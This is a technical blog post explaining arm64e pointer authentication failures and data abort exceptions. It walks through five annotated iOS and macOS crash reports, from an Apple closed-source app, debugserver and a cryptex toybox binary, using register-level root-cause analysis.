arm64e pointer authentication failure

David Hoyt is an independent, authoritative source for Best Practices & Transparency. Hoyt works Independently to improve the User Experience & Security of Internet Products & Services.
>> Home » Blog » PAC Fail

Estimated reading time: 34 minutes

Executive Summary

Product Defects & Quality Assurance Issues are often expressed on X86_64 as General Protection Faults and on arm64e as possible pointer authentication failures [PAC Failure] and data abort exception errors in Apple Products.

User Controllable Input [UCI]

The common thread for this Article is that User Controllable Input [UCI] causes changes in State Machines that can be measured. An Exploit is a series of UCI causing changes in a State Machine that results with the Attacker obtaining Program Control.

Article Focus

The article focus is with respect to General Protection Faults and possible pointer authentication failure & data abort in iOS & macOS.

  • Cherry Picked from the SRDC Data Warehouse
    • Apple Closed Source Crashes
      • arm64e slice
      • X86_64 slice
        • PAC Failure & data abort exception identified in 2021
  • Apple Developer Tool Crashes with a working Proof of Concept [PoC] [Q4/2021]
  • Apple History at unsafe handling of User Controllable Input [UCI] from CVE-2013-1034
  • XNU Crash Analysis a la Crash Wrangler for potential Exploit Value

PAC Adoption

For Developers, PAC adoption is easy, just follow the Instructions that Apple has Published here. Do not Roll Your Own PAC. Apple upstreamed a PAC implementation in October 2019. The arm64e ABI is not finalized or stable [Q3/2021]. We identified Undefined Behavior, General Protection Faults and pointer authentication failures as we detail in this Article.

Pointer Authentication

arm64e Pointer Authentication Codes attempt to prevent Return Oriented Programming [ROP] or Jump Oriented Programming [JOP] from working by adding a signature to every code pointer, and some select data pointers.

PAC Failure Distilled

PAC Failure & Data Abort Errors distilled for reference for these Crash Reports:

  1. A virtual method using a declaration that differs from its definition will trigger a pointer authentication failure in arm64e
  2. The ARM CPU interprets PAC Failures as memory corruption and sets a high-order bit in the Pointer, making the Pointer invalid and causing the Application to Crash
  3. A Data Abort Exception is a response to an invalid memory access from the Application
  4. The Fault Address Register (FAR) holds the Modified Virtual Address (MVA) of the access being attempted when a fault occurred
  5. Reading from or writing to a read- or write-protected page generates a SIGBUS
  6. Jumping to a non-executable page, accessing unmapped memory results in a SIGSEV
  7. There are cases where the kernel turns what would be a SIGBUS into a SIGSEGV (like overflowing the stack).
  8. XNU Crash Analysis & Vulnerability potential is a seperate Article

Program Counter

From Apple Documentation: focus on the program counter, a register that contains the address of the instruction that caused the memory access exception. On ARM CPU architectures, this is the pc register.

Memory vs Instruction Distilled

Case 1: Is pc != exception address, then Crash is invalid memory
Case 2: Is pc == exception address, then Crash is invalid instruction

Pointer Signatures

The Pointer Signature is stored in unused high bits of a 64-bit pointer (~25 bits today)

0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A

arm64e Signs a raw (unauthenticated) pointer, producing a signed pointer: PACIA Xd, Xn

1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A

arm64e Authenticates a signed pointer, producing a raw pointer. Verifies the signature and strips it on success: AUTDB Xd, Xn

0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A

Pointers with an invalid signature can’t be authenticated: AUTDB Xd, Xn

X X X X X X X X X X X X X X X X X X X X X X X X A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A
Z Z Z Z X X X X X X X X X X X X X X X X X X X X A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A

The Result of the invalid signature that can’t be authenticated on the arm64e slice is KERN_INVALID_ADDRESS: 0x11… –> 0x00… (possible pointer authentication failure) which can be similar to an EXC_I386_GPFLT Crash on the X86_64 Platform as shown below.

Crash #1 – Apple Closed Source

Here is Crash Report #1. This is an Apple Closed Source Application. Crashes 1 + 2 use the same PoC.

Crashed Thread:        0  Dispatch queue: com.apple.main-thread
Exception Type:        EXC_BAD_ACCESS (SIGSEGV)
Exception Codes:       KERN_INVALID_ADDRESS at 0x00200002052fe490 -> 0x00000002052fe490 (possible pointer authentication failure)
Exception Note:        EXC_CORPSE_NOTIFY
Termination Signal:    Segmentation fault: 11
Termination Reason:    Namespace SIGNAL, Code 0xb
Terminating Process:   exc handler [13533]
VM Regions Near 0x2052fe490:
    __AUTH_CONST                2052fd248-2052fde30    [  3048] r--/rw- SM=COW  /usr/lib/system/libsystem_c.dylib
--> __AUTH_CONST                2052fde30-2052ffa70    [    7K] r--/rw- SM=COW  /usr/lib/libc++.1.dylib
    __AUTH_CONST                2052ffa70-205302c58    [   12K] r--/rw- SM=COW  /usr/lib/libc++abi.dylib
Application Specific Information:
dyld2 mode
Thread 0 Crashed:: Dispatch queue: com.apple.main-thread
0   redacted             	0x00000001046c38e8 0x1046b4000 + 63720
1   redacted             	0x00000001046c38d4 0x1046b4000 + 63700
2   redacted             	0x00000001046c09e8 0x1046b4000 + 51688
3   libdyld.dylib                 	0x00000001969c9450 start + 4
Thread 0 crashed with ARM Thread State (64-bit):
    x0: 0x0000000201ca4498   x1: 0x0000000201ca4160   x2: 0x000000016b74bb38   x3: 0x000000016b74bb90
    x4: 0x0000000000000000   x5: 0x0000000000000000   x6: 0x0000000000000000   x7: 0x0000000000000000
    x8: 0x0000000000000012   x9: 0xffffffffffffffff  x10: 0x00000001046b4648  x11: 0x0000000080000028
   x12: 0x0000000080000028  x13: 0x0000000000000000  x14: 0x0000000000000881  x15: 0x000000000000000c
   x16: 0x00200002052fe458  x17: 0x634f000201ca4498  x18: 0x0000000000000000  x19: 0x000000016b74b830
   x20: 0x000000016b74b838  x21: 0x0000000000000001  x22: 0x000000016b74b830  x23: 0x000000016b74b828
   x24: 0x0000000000000000  x25: 0x000000016b74bb18  x26: 0x0000000000000000  x27: 0x0000000000000000
   x28: 0x000000016b74bb08   fp: 0x000000016b74b510   lr: 0x78448001046c38d4
    sp: 0x000000016b74b4e0   pc: 0x00000001046c38e8 cpsr: 0x80000000
   far: 0x00200002052fe490  esr: 0x92000004
Binary Images:
       0x1046b4000 -        0x104727fff +redacted
       0x104a50000 -        0x104acffff  dyld

Root Cause Analysis of Crash #1

Classic Crash Analysis is that Apple’s Pointer, 0x00200002052fe490, points to the __AUTH_CONST region of lib++.1.dylib at 0x00000002052fe490, the upper bits of the Pointer are incorrect. The error message ‘possible pointer authentication failure’ is thrown resulting in EXC_BAD_ACCESS (SIGSEGV). Note 0x002000 representing the invalid PAC. This Crash fits into Case 1: Is pc != exception address, the Crash is invalid memory access expressed as pc != FAR. The pc of 0x00000001046c38e8 is not equal to the FAR of 0x00200002052fe490. The Developers may also be calling a virtual method using a declaration that differs from its definition that will trigger a pointer authentication failure in arm64e.

CPU interprets PAC Failures as memory corruption

The CPU interprets PAC Failures as memory corruption and sets a high-order bit in the Pointer, making the Pointer invalid and causing the Application to Crash as detailed here. My gut says there is a Compiler Bug and/or c++ memory Bug too.

Crash #2 – Apple Closed Source

Here is Crash Report #2. This is the same Apple Closed Source Application. For Crashes 1 + 2 use the same PoC.

Crashed Thread:        0  Dispatch queue: com.apple.main-thread
Exception Type:        EXC_BAD_ACCESS (SIGSEGV)
Exception Codes:       KERN_INVALID_ADDRESS at 0x00200002052fe490 -> 0x00000002052fe490 (possible pointer authentication failure)
Exception Note:        EXC_CORPSE_NOTIFY
Termination Reason:    Namespace SIGNAL, Code 11 Segmentation fault: 11
Terminating Process:   exc handler [13511]
VM Region Info: 0x2052fe490 is in 0x2052fde30-0x2052ffa70;  bytes after start: 1632  bytes before end: 5599
      REGION TYPE                    START - END         [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
      __AUTH_CONST                2052fd248-2052fde30    [  3048] r--/rw- SM=COW  ...ystem_c.dylib
--->  __AUTH_CONST                2052fde30-2052ffa70    [    7K] r--/rw- SM=COW  ...ibc++.1.dylib
      __AUTH_CONST                2052ffa70-205302c58    [   12K] r--/rw- SM=COW  ...bc++abi.dylib
Application Specific Information:
Thread 0 Crashed::  Dispatch queue: com.apple.main-thread
0   redacted             	       0x104c8b8e8 0x104c7c000 + 63720
1   redacted             	       0x104c8b8d4 0x104c7c000 + 63700
2   redacted             	       0x104c889e8 0x104c7c000 + 51688
3   libdyld.dylib                 	       0x1969c9450 start + 4
Thread 0 crashed with ARM Thread State (64-bit):
    x0: 0x0000000201ca4498   x1: 0x0000000201ca4160   x2: 0x000000016b183b50   x3: 0x000000016b183ba8
    x4: 0x0000000000000000   x5: 0x0000000000000000   x6: 0x0000000000000000   x7: 0x0000000000000000
    x8: 0x0000000000000012   x9: 0xffffffffffffffff  x10: 0x0000000104c7c648  x11: 0x0000000080000028
   x12: 0x0000000080000028  x13: 0x0000000000000000  x14: 0x0000000000000881  x15: 0x000000000000000c
   x16: 0x00200002052fe458  x17: 0x634f000201ca4498  x18: 0x0000000000000000  x19: 0x000000016b183850
   x20: 0x000000016b183858  x21: 0x0000000000000001  x22: 0x000000016b183850  x23: 0x000000016b183848
   x24: 0x0000000000000000  x25: 0x000000016b183b30  x26: 0x0000000000000000  x27: 0x0000000000000000
   x28: 0x000000016b183b20   fp: 0x000000016b183530   lr: 0xf767800104c8b8d4
    sp: 0x000000016b183500   pc: 0x0000000104c8b8e8 cpsr: 0x80000000
   far: 0x00200002052fe490  esr: 0x92000004 (Data Abort) byte read Translation fault
Binary Images:
       0x104c7c000 -        0x104ceffff redacted
       0x1969b1000 -        0x1969f2fff libdyld.dylib (*)  

Root Cause Analysis of Crash #2

Classic Crash Analysis is that Apple’s Pointer, 0x00200002052fe490, points to the __AUTH_CONST region of lib++.1.dylib at 0x00000002052fe490, the upper bits of the Pointer are incorrect. The error message ‘possible pointer authentication failure’ is thrown resulting in EXC_BAD_ACCESS (SIGSEGV). Note 0x002000 representing the invalid PAC. This Crash fits into Case 1: Is pc != exception address, the Crash is invalid memory access expressed as pc != FAR. The pc of 0x00000001046c38e8 is not equal to the FAR of 0x00200002052fe490. The Developers may also be calling a virtual method using a declaration that differs from its definition that will trigger a pointer authentication failure in arm64e.

Exception Syndrome Register

Focusing on the Exception Syndrome Register [esr]: A data abort exception is an invalid memory access from the Application. This Crash fits into Case 1: Is pc != exception address, the Crash is invalid memory access expressed as pc != FAR. The pc of 0x0000000104c8b8e8 is not equal to the FAR of 0x00200002052fe490. The Apple Closed Source Application Crash is due to an Invalid Memory Operation expressed as (Data Abort) byte read Translation fault.

CPU interprets PAC Failures as memory corruption

The CPU interprets PAC Failures as memory corruption and sets a high-order bit in the Pointer, making the Pointer invalid and causing the Application to Crash as detailed here. My gut says there is a Compiler Bug and/or c++ memory Bug too.

Crash #3 – debugserver

Here is Crash Report #3. ebugserver for iOS Research for Apple Security Research Device.

Hardware Model:      iPhone12,1
Process:             debugserver [338]
Path:                /private/var/run/com.apple.security.cryptexd/mnt/com.example.cryptex.TEzNH3/usr/bin/debugserver
Identifier:          debugserver
Version:             ???
Code Type:           ARM-64 (Native)
Role:                Unspecified
Parent Process:      sh [323]
Coalition:           com.example.cryptex.sshd [491]
Date/Time:           2021-08-26 11:41:24.9974 -0400
Launch Time:         2021-08-26 11:41:24.2901 -0400
OS Version:          iPhone OS 15.0 (19A5337a)
Release Type:        Beta
Baseband Version:    3.00.00
Report Version:      104
Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
Exception Subtype: KERN_INVALID_ADDRESS at 0x002000010257ce18 -> 0x000000010257ce18 (possible pointer authentication failure)
Exception Codes: 0x0000000000000001, 0x002000010257ce18
VM Region Info: 0x10257ce18 is in 0x10257c000-0x102588000;  bytes after start: 3608  bytes before end: 45543
      REGION TYPE                 START - END      [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
      __TEXT                   102504000-10257c000 [  480K] r-x/r-x SM=COW  ...n/debugserver
--->  __DATA_CONST             10257c000-102588000 [   48K] r--/rw- SM=COW  ...n/debugserver
      __DATA                   102588000-102994000 [ 4144K] rw-/rw- SM=COW  ...n/debugserver
Exception Note:  EXC_CORPSE_NOTIFY
Termination Reason: SIGNAL; [11]
Terminating Process: exc handler [338]
Terminating Process: exc handler [338]
Triggered by Thread:  0
Thread 0 name:  main thread Dispatch queue: com.apple.main-thread
Thread 0 Crashed:
0   libc++.1.dylib                	       0x19c485b0c 0x19c47a000 + 47884
1   debugserver                   	       0x102511a24 0x102504000 + 55844
2   debugserver                   	       0x10250c698 0x102504000 + 34456
3   debugserver                   	       0x10250e768 0x102504000 + 42856
4   dyld                          	       0x102a69a24 0x102a50000 + 104996
Thread 0 crashed with ARM Thread State (64-bit):
    x0: 0x0000000103a04470   x1: 0x0000000104009200   x2: 0x0000000104000000   x3: 0x0000000000000800
    x4: 0x0000000000000120   x5: 0x0000000103904470   x6: 0x0000000000000029   x7: 0x000000000000003e
    x8: 0x0000000103a04480   x9: 0x0000000000000000  x10: 0x0000000000000000  x11: 0x0000000000000a00
   x12: 0x0000000000000001  x13: 0x0000000104000000  x14: 0x0000000000000001  x15: 0x0000000000000002
   x16: 0x002000010257cdf8  x17: 0x634f000103a04470  x18: 0x0000000000000000  x19: 0x0000000103a04470
   x20: 0x0000000000000400  x21: 0x000000016d8fa818  x22: 0x0000000000000000  x23: 0x0000000000000000
   x24: 0x0000000104009200  x25: 0x0000000000000001  x26: 0x000000007fffffff  x27: 0x00000001038120d0
   x28: 0x0000000000000000   fp: 0x000000016d8fa7f0   lr: 0x0000000102511a24
    sp: 0x000000016d8fa490   pc: 0x000000019c485b0c cpsr: 0x60000000
   far: 0x002000010257ce18  esr: 0x92000004 (Data Abort) byte read Translation fault
Binary Images:
       0x19c47a000 -        0x19c4ddfff libc++.1.dylib arm64e  <15095115b2ab37719e86897521087066> /usr/lib/libc++.1.dylib
       0x102504000 -        0x10257bfff debugserver arm64e  <54186028cc6b35dfaf1be2fd9ab24404> /private/var/run/com.apple.security.cryptexd/mnt/com.example.cryptex.TEzNH3/usr/bin/debugserver
       0x102a50000 -        0x102aa7fff dyld arm64e  <1602b2f2df6234128bc6ece21486c3e0> /usr/lib/dyld
               0x0 - 0xffffffffffffffff ??? unknown-arch  <00000000000000000000000000000000> ???
EOF

Root Cause Analysis of Crash #3

By now you should be able to express your own opinion with respect to the Crash. What is your Root Cause Analysis of Crash #3?

Exception Syndrome Register

Focusing on the Exception Syndrome Register [esr]: A data abort exception is an invalid memory access from the Application. This Crash fits into Case 1: Is pc != exception address, the Crash is invalid memory access expressed as pc != FAR. The Apple Closed Source Application Crash is due to an Invalid Memory Operation expressed as (Data Abort) byte read Translation fault. The Developers may also be calling a virtual method using a declaration that differs from its definition that will trigger a pointer authentication failure in arm64e.

CPU interprets PAC Failures as memory corruption

The CPU interprets PAC Failures as memory corruption and sets a high-order bit in the Pointer, making the Pointer invalid and causing the Application to Crash as detailed here. My gut says there is a Compiler Bug and/or c++ memory Bug too.

Crash #4 – debugserver

Here is Crash Report #4. SRDC has chosen debugserver for iOS Research to conduct a Quality Assurance Audit due the circumstances described above with respect to personalization’s from M1 Platform.

Hardware Model:      iPhone12,1
Process:             debugserver [1226]
Path:                /private/var/run/com.apple.security.cryptexd/mnt/com.example.cryptex.k6Rp0l/usr/bin/debugserver
Identifier:          debugserver
Version:             ???
Code Type:           ARM-64 (Native)
Role:                Unspecified
Parent Process:      sh [1154]
Coalition:           com.example.cryptex.sshd [492]
Date/Time:           2021-06-29 15:56:20.3585 -0400
Launch Time:         2021-06-29 15:56:16.8742 -0400
OS Version:          iPhone OS 15.0 (19A5281h)
Release Type:        Beta
Baseband Version:    2.50.04
Report Version:      104
Exception Type:  EXC_BREAKPOINT (SIGTRAP)
Exception Codes: 0x0000000000000001, 0x00000001994654e0
Exception Note:  EXC_CORPSE_NOTIFY
Termination Reason: SIGNAL; [5]
Terminating Process: exc handler [1226]
Terminating Process: exc handler [1226]
Triggered by Thread:  0
Thread 0 name:  main thread Dispatch queue: com.apple.main-thread
Thread 0 Crashed:
0   libc++.1.dylib                	       0x1994654e0 std::__1::basic_ostream<char, std::__1::char_traits<char> >::sentry::sentry(std::__1::basic_ostream<char, std::__1::char_traits<char> >&) + 60
1   debugserver                   	       0x104c60e8c std::__1::basic_ostream<char, std::__1::char_traits<char> >& std::__1::__put_character_sequence<char, std::__1::char_traits<char> >(std::__1::basic_ostream<char, std::__1::char_traits<char> >&, char const*, unsigned long) + 56
2   debugserver                   	       0x104c60e8c std::__1::basic_ostream<char, std::__1::char_traits<char> >& std::__1::__put_character_sequence<char, std::__1::char_traits<char> >(std::__1::basic_ostream<char, std::__1::char_traits<char> >&, char const*, unsigned long) + 56
3   debugserver                   	       0x104c4de9c RNBRemote::HandlePacket_qHostInfo(char const*) + 496
4   debugserver                   	       0x104c57fa0 RNBRemote::HandleReceivedPacket(RNBRemote::PacketEnum*) + 356
5   debugserver                   	       0x104c30b8c RNBRunLoopInferiorExecuting(RNBRemote*) + 392
6   debugserver                   	       0x104c31fd8 main + 3772
7   dyld                          	       0x10551371c start + 520
Thread 1 name:  exception monitoring thread
Thread 1:
0   libsystem_kernel.dylib        	       0x1b7684594 mach_msg_trap + 8
1   libsystem_kernel.dylib        	       0x1b7684ff4 mach_msg + 76
2   debugserver                   	       0x104c68590 MachException::Message::Receive(unsigned int, int, unsigned int, unsigned int) + 188
3   debugserver                   	       0x104c77450 MachTask::ExceptionThread(void*) + 340
4   libsystem_pthread.dylib       	       0x1f235f200 _pthread_start + 148
5   libsystem_pthread.dylib       	       0x1f235ed5c thread_start + 8
Thread 2:
0   libsystem_pthread.dylib       	       0x1f235ed48 start_wqthread + 0
Thread 3:
0   libsystem_pthread.dylib       	       0x1f235ed48 start_wqthread + 0
Thread 4 name:  kqueue thread
Thread 4:
0   libsystem_kernel.dylib        	       0x1b7687d1c kevent + 8
1   debugserver                   	       0x104c347f4 kqueue_thread(void*) + 168
2   libsystem_pthread.dylib       	       0x1f235f200 _pthread_start + 148
3   libsystem_pthread.dylib       	       0x1f235ed5c thread_start + 8
Thread 5 name:  child process status watcher thread
Thread 5:
0   libsystem_kernel.dylib        	       0x1b7685468 __psynch_cvwait + 8
1   libsystem_pthread.dylib       	       0x1f2362d60 _pthread_cond_wait + 1240
2   debugserver                   	       0x104c3fc44 PThreadEvent::WaitForSetEvents(unsigned int, timespec const*) const + 60
3   debugserver                   	       0x104c35b6c DNBProcessWaitForEvents(int, unsigned int, bool, timespec*) + 76
4   debugserver                   	       0x104c40894 RNBContext::ThreadFunctionProcessStatus(void*) + 232
5   libsystem_pthread.dylib       	       0x1f235f200 _pthread_start + 148
6   libsystem_pthread.dylib       	       0x1f235ed5c thread_start + 8
Thread 6 name:  read gdb-remote packets thread
Thread 6:
0   libsystem_kernel.dylib        	       0x1b7686ed8 read + 8
1   debugserver                   	       0x104c644c8 RNBSocket::Read(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&) + 112
2   debugserver                   	       0x104c58700 RNBRemote::ThreadFunctionReadRemoteData(void*) + 196
3   libsystem_pthread.dylib       	       0x1f235f200 _pthread_start + 148
4   libsystem_pthread.dylib       	       0x1f235ed5c thread_start + 8
Thread 0 crashed with ARM Thread State (64-bit):
    x0: 0x000000016b1d6898   x1: 0x000000016b1d6950   x2: 0x0000000000000008   x3: 0x000000016b1d6920
    x4: 0x0000000000000000   x5: 0x0000000000000000   x6: 0x0000000000000041   x7: 0x0000000105607080
    x8: 0x0000000000000004   x9: 0x0000000000000001  x10: 0x000000016b1d6b28  x11: 0x666e4974736f4871
   x12: 0x0000000000000001  x13: 0x00000000ffffffff  x14: 0x000000000057014b  x15: 0x000000000000014b
   x16: 0x0020000104ca1468  x17: 0x0000000104ca1468  x18: 0x0000000000000000  x19: 0x000000016b1d6898
   x20: 0x0000000104c8fafc  x21: 0x0000000000000008  x22: 0x00000001056067e8  x23: 0x000000000100000c
   x24: 0x0000000000000002  x25: 0x003d310104ca1468  x26: 0x0013060104ca1538  x27: 0x0000000000000000
   x28: 0x00000001050b5000   fp: 0x000000016b1d6880   lr: 0x0b56050104c60e8c
    sp: 0x000000016b1d6870   pc: 0x00000001994654e0 cpsr: 0x20000000
   far: 0x0000000104c4dcac  esr: 0xf200c472 (Breakpoint) pointer authentication trap DA
Binary Images:
       0x199440000 -        0x1994a9fff libc++.1.dylib arm64e  <f7a780c792db3cf8b8f1641bd5a643e4> /usr/lib/libc++.1.dylib
       0x104c28000 -        0x104c9ffff debugserver arm64e  <54186028cc6b35dfaf1be2fd9ab24404> /private/var/run/com.apple.security.cryptexd/mnt/com.example.cryptex.k6Rp0l/usr/bin/debugserver
       0x1054f4000 -        0x10554bfff dyld arm64e  <9bca7d9fe7ba314d8c36e3396b56ffa6> /usr/lib/dyld
       0x1b7683000 -        0x1b76b6fff libsystem_kernel.dylib arm64e  <0a00d7f34e8e3baabe575c21e07cc8aa> /usr/lib/system/libsystem_kernel.dylib
       0x1f235e000 -        0x1f2369fff libsystem_pthread.dylib arm64e  <95d7224a99ce3a7e94ab586530c23f5c> /usr/lib/system/libsystem_pthread.dylib
EOF

Root Cause Analysis of Crash #4

Focusing on the Exception Syndrome Register [esr]: (Breakpoint) pointer authentication trap DA is a Programmer Error that failed to properly Authenticate a pointer using key/discriminator A. That is a significant Compiler Bug! My gut says there is another Compiler Bug and/or c++ memory Bug too.

Crash #5 – com.apple.security.cryptexd

Here is Crash Report #5. SRDC has chosen com.apple.security.cryptexd to conduct a Quality Assurance Audit due the circumstances described above with respect to personalization’s from M1 Platform. This initially looked like a Bug in Toybox, but my inexperience with arm64e quickly became evident. The process turned into a good learning experience.

Hardware Model:      iPhone12,1
Process:             toybox [457]
Path:                /private/var/run/com.apple.security.cryptexd/mnt/com.example.cryptex.3o3V5D/usr/bin/toybox
Identifier:          toybox
Version:             ???
Code Type:           ARM-64 (Native)
Role:                Unspecified
Parent Process:      sh [378]
Coalition:           com.example.cryptex.sshd [286]
Date/Time:           2021-03-08 20:44:07.4887 -0500
Launch Time:         2021-03-08 20:44:07.4168 -0500
OS Version:          iPhone OS 14.4 (18D52)
Release Type:        User
Baseband Version:    2.03.04
Report Version:      104
Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
Exception Subtype: KERN_INVALID_ADDRESS at 0x6b726f7774656e50 -> 0x0000007774656e50 (possible pointer authentication failure)
VM Region Info: 0x7774656e50 is not in any region.  Bytes after previous region: 32017575505  
      REGION TYPE                 START - END      [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
      commpage (reserved)     1000000000-7000000000 [384.0G] ---/--- SM=NUL  ...(unallocated)
--->  
      UNUSED SPACE AT END
Termination Signal: Segmentation fault: 11
Termination Reason: Namespace SIGNAL, Code 0xb
Terminating Process: exc handler [457]
Triggered by Thread:  0
Thread 0 name:  Dispatch queue: com.apple.main-thread
Thread 0 Crashed:
0   libsystem_platform.dylib      	0x00000001d219fbc4 _platform_strlen + 4
1   libsystem_c.dylib             	0x000000018faf016c __vfprintf + 4328
2   libsystem_c.dylib             	0x000000018fb12e0c __v2printf + 396
3   libsystem_c.dylib             	0x000000018fb13044 __xvprintf + 240
4   libsystem_c.dylib             	0x000000018faeef80 vfprintf_l + 68
5   libsystem_c.dylib             	0x000000018faed7b8 printf + 84
6   id                            	0x00000001023ca240 0x10239c000 + 188992
7   id                            	0x00000001023adf88 0x10239c000 + 73608
8   id                            	0x00000001023ad978 0x10239c000 + 72056
9   id                            	0x00000001023adfd0 0x10239c000 + 73680
10  libdyld.dylib                 	0x000000018632a6b0 start + 4
Thread 0 crashed with ARM Thread State (64-bit):
    x0: 0x6b726f7774656e5f   x1: 0x6b726f7774656e50   x2: 0x0000000000000000   x3: 0x000000016da632b3
    x4: 0x000000016da62e70   x5: 0x000000016da63800   x6: 0x0000000000000031   x7: 0x0000000000000f50
    x8: 0x6b726f7774656e5f   x9: 0x000000018fb29aac  x10: 0x0000000000000001  x11: 0x0000000000000003
   x12: 0x0000000000000000  x13: 0x0000000000000000  x14: 0x0000000000000010  x15: 0x0000000000000001
   x16: 0x00000001d219fbc0  x17: 0x000000018faf1de4  x18: 0x0000000000000000  x19: 0x000000016da62d60
   x20: 0x0000000000000003  x21: 0x0000000000000073  x22: 0x00000001023e7526  x23: 0x000000000000000a
   x24: 0x0000000000000000  x25: 0x00000001023e7524  x26: 0x6b726f7774656e5f  x27: 0x0000000000000000
   x28: 0x000000016da62e78   fp: 0x000000016da63130   lr: 0x000000018faf016c
    sp: 0x000000016da62d60   pc: 0x00000001d219fbc4 cpsr: 0x20000000
   esr: 0x92000004 (Data Abort) byte read Translation fault
Binary Images:
0x10239c000 - 0x1023e7fff id arm64e  <5355f62ffbc5313781546fd6137f4656> /var/run/com.apple.security.cryptexd/mnt/com.example.cryptex.3o3V5D/usr/bin/id
0x1026ec000 - 0x10275bfff dyld arm64e  <1f4d7499ee603c5d9d542cd29e4e537c> /usr/lib/dyld
0x1862e6000 - 0x186328fff libdispatch.dylib arm64e  <b92757b104343e9ba3acb6da6b81945c> /usr/lib/system/libdispatch.dylib
0x186329000 - 0x186363fff libdyld.dylib arm64e  <21b19919133438bcb233896e929945e0> /usr/lib/system/libdyld.dylib
0x18fa87000 - 0x18faacfff libsystem_info.dylib arm64e  <4141392213e530b7907d6662a1eab27e> /usr/lib/system/libsystem_info.dylib
0x18faad000 - 0x18fb2bfff libsystem_c.dylib arm64e  <961a8fb0de8a3567b4375d99cd549fae> /usr/lib/system/libsystem_c.dylib
0x1964e3000 - 0x196506fff libsystem_malloc.dylib arm64e  <bbade3853af53399b1d6180c6d33df9c> /usr/lib/system/libsystem_malloc.dylib
0x198594000 - 0x1985a3fff libsystem_networkextension.dylib arm64e  <72e9b04cefb3311398130faa22fd28af> /usr/lib/system/libsystem_networkextension.dylib
0x19b70a000 - 0x19b740fff libobjc.A.dylib arm64e  <fea23cff02cf34268a4f893396ce92ff> /usr/lib/libobjc.A.dylib
0x19b7a4000 - 0x19b802fff libc++.1.dylib arm64e  <4a0b48d835483ad794c55e54ab10b6fa> /usr/lib/libc++.1.dylib
0x19b803000 - 0x19b81cfff libc++abi.dylib arm64e  <2c28dce19a893752bcfc907e99183a63> /usr/lib/libc++abi.dylib
0x19d4c7000 - 0x19d4ddfff libsystem_trace.dylib arm64e  <3520924c65a7351dadbea07268a9bca7> /usr/lib/system/libsystem_trace.dylib
0x1a162e000 - 0x1a1638fff libsystem_notify.dylib arm64e  <cb00557eecb73b8ebee94de4a0b862aa> /usr/lib/system/libsystem_notify.dylib
0x1a16ec000 - 0x1a1760fff libcorecrypto.dylib arm64e  <7282f135d28937129081a2b32fdb3622> /usr/lib/system/libcorecrypto.dylib
0x1a1862000 - 0x1a1878fff libsystem_asl.dylib arm64e  <6861da31b33a393eadeaa36da03ba670> /usr/lib/system/libsystem_asl.dylib
0x1a8f26000 - 0x1a8f2dfff libsystem_symptoms.dylib arm64e  <ee0315ac9aab3bd4ab86ede010db097a> /usr/lib/system/libsystem_symptoms.dylib
0x1b4622000 - 0x1b4653fff libsystem_kernel.dylib arm64e  <b373b97b671e301ca6b7c9f92e17dca0> /usr/lib/system/libsystem_kernel.dylib
0x1b6f16000 - 0x1b6f17fff libSystem.B.dylib arm64e  <7d42c8382a04372e9fccdc7a95ef88f4> /usr/lib/libSystem.B.dylib
0x1d1252000 - 0x1d1252fff libcharset.1.dylib arm64e  <b28f9d663d723a4198566fd8d095045a> /usr/lib/libcharset.1.dylib
0x1d1336000 - 0x1d142bfff libiconv.2.dylib arm64e  <03e7a7e4dde835508741edd69270af5f> /usr/lib/libiconv.2.dylib
0x1d1c3b000 - 0x1d1c53fff libresolv.9.dylib arm64e  <51b76938e8c13d458dd30429749fef91> /usr/lib/libresolv.9.dylib
0x1d1ca0000 - 0x1d1ca3fff libutil.dylib arm64e  <d77e2807eed438349e164bb8d9e1edcc> /usr/lib/libutil.dylib
0x1d1dbe000 - 0x1d1dcffff libz.1.dylib arm64e  <9e35153333503f8bb9b567ec5881c5ef> /usr/lib/libz.1.dylib
0x1d2025000 - 0x1d202afff libcache.dylib arm64e  <7567dfaa324e306aa66fc2dda88b033b> /usr/lib/system/libcache.dylib
0x1d202b000 - 0x1d2038fff libcommonCrypto.dylib arm64e  <25abfbdfed4431f7a628bd742e231f31> /usr/lib/system/libcommonCrypto.dylib
0x1d2039000 - 0x1d203cfff libcompiler_rt.dylib arm64e  <d33e74102bae373585edeb219279aa43> /usr/lib/system/libcompiler_rt.dylib
0x1d203d000 - 0x1d2045fff libcopyfile.dylib arm64e  <fae70da0ebad33f293ac496dcbe46fea> /usr/lib/system/libcopyfile.dylib
0x1d212d000 - 0x1d212dfff liblaunch.dylib arm64e  <2484228087bc30c68b69739b80187b10> /usr/lib/system/liblaunch.dylib
0x1d212e000 - 0x1d2133fff libmacho.dylib arm64e  <4228e603576133778acefc84d49a4d2f> /usr/lib/system/libmacho.dylib
0x1d2134000 - 0x1d2136fff libremovefile.dylib arm64e  <904853f042653abe93730a3ecdf39678> /usr/lib/system/libremovefile.dylib
0x1d2137000 - 0x1d2138fff libsystem_blocks.dylib arm64e  <f285e167aaa73ab7a092085ca4d1a0c5> /usr/lib/system/libsystem_blocks.dylib
0x1d2139000 - 0x1d213bfff libsystem_collections.dylib arm64e  <ea85747378323fa18286e5b16bc56a4e> /usr/lib/system/libsystem_collections.dylib
0x1d213c000 - 0x1d2140fff libsystem_configuration.dylib arm64e  <230a7783b6ac3c7fba6991bdfa91823d> /usr/lib/system/libsystem_configuration.dylib
0x1d2141000 - 0x1d2153fff libsystem_containermanager.dylib arm64e  <01ba22f7abce3319860fb76d10a0d6d9> /usr/lib/system/libsystem_containermanager.dylib
0x1d2154000 - 0x1d2155fff libsystem_coreservices.dylib arm64e  <f83a3238b8303072ab9113587ed26129> /usr/lib/system/libsystem_coreservices.dylib
